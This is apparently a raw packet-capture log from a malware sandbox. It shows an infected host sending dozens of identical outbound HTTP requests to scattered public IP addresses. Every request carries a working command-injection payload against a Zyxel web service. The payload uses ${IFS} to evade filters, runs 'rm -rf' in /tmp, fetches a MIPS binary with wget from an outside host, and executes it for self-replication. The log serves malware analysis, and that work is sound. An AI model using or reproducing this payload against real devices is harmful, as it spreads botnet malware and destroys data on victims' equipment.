                                        Mar 31, 2024 09:21:03.636255980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3262192.168.2.2332816130.134.220.142443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636341095 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3263192.168.2.2350902109.158.43.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636380911 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3264192.168.2.2342214136.177.253.196443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636435032 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3265192.168.2.233316259.235.98.25443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636508942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3266192.168.2.233664290.4.244.160443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636562109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3267192.168.2.2349754133.210.126.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636631012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3268192.168.2.235863471.11.7.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636683941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3269192.168.2.233492481.246.169.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636735916 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3270192.168.2.2332790148.175.49.36443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636799097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3271192.168.2.2353968179.48.160.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636868954 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3272192.168.2.233607669.148.217.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.636929989 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3273192.168.2.235360813.82.215.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637017012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3274192.168.2.2336730221.188.61.247443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637078047 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3275192.168.2.2342608135.185.71.189443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637124062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3276192.168.2.234484491.80.151.170443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637172937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3277192.168.2.2359698151.61.199.21443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637237072 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3278192.168.2.2358238177.11.155.188443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637322903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3279192.168.2.233518647.113.241.41443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637368917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3280192.168.2.233748214.109.119.99443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637443066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3281192.168.2.2336186149.172.78.241443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637499094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3282192.168.2.234850045.162.246.246443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637543917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3283192.168.2.235986696.221.150.24443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637618065 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3284192.168.2.2343886159.151.42.231443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637650967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3285192.168.2.235293889.225.201.150443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637701988 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3286192.168.2.2355698211.53.254.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637742996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3287192.168.2.235553469.121.238.215443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637804031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3288192.168.2.2347264180.231.127.19443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637871027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3289192.168.2.2344234104.38.100.72443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637952089 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3290192.168.2.2337732122.249.211.97443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.637996912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3291192.168.2.2344332170.112.67.249443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638071060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3292192.168.2.234113876.132.211.101443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638117075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3293192.168.2.235462857.156.57.13443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638156891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3294192.168.2.233630237.63.204.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638226986 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3295192.168.2.23492021.86.40.86443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638295889 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3296192.168.2.233907064.231.1.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638367891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3297192.168.2.2344988110.26.36.113443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638418913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3298192.168.2.233784673.45.178.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638478041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3299192.168.2.2352286200.165.215.176443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638525963 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3300192.168.2.2345674209.138.84.194443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638602018 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3301192.168.2.234790054.243.139.46443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638650894 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3302192.168.2.2358198219.87.100.91443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638709068 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3303192.168.2.2344286184.83.90.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638787985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3304192.168.2.2359870142.116.115.131443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638866901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3305192.168.2.2335236216.33.31.197443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638930082 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3306192.168.2.2335364191.195.189.207443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.638962984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3307192.168.2.2354876147.247.122.50443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639014006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3308192.168.2.2348842165.63.127.158443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639097929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3309192.168.2.233465487.228.21.198443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639161110 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3310192.168.2.235026495.110.100.145443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639214039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3311192.168.2.2340696184.105.141.103443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639267921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3312192.168.2.23478642.99.121.87443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639363050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3313192.168.2.233948289.236.239.47443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639403105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3314192.168.2.2355758167.150.246.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639465094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3315192.168.2.2344398205.211.41.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639542103 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3316192.168.2.2349630116.172.3.64443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639596939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3317192.168.2.2347502113.113.117.225443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639653921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3318192.168.2.2336470192.187.151.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639722109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3319192.168.2.235098680.165.227.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639786005 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3320192.168.2.2350844209.114.39.35443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639839888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3321192.168.2.2338818186.165.58.155443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639899969 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3322192.168.2.2332928161.122.142.166443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.639971972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3323192.168.2.23607204.103.156.181443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640069008 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3324192.168.2.235411887.133.138.109443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640120029 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3325192.168.2.234204284.174.144.179443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640180111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3326192.168.2.2346212102.132.42.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640249968 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3327192.168.2.2359310102.57.35.146443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640331984 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3328192.168.2.235187472.121.96.84443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:21:03.640387058 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        3329192.168.2.233969042.252.5.96443
                                        TimestampBytes transferredDirectionData
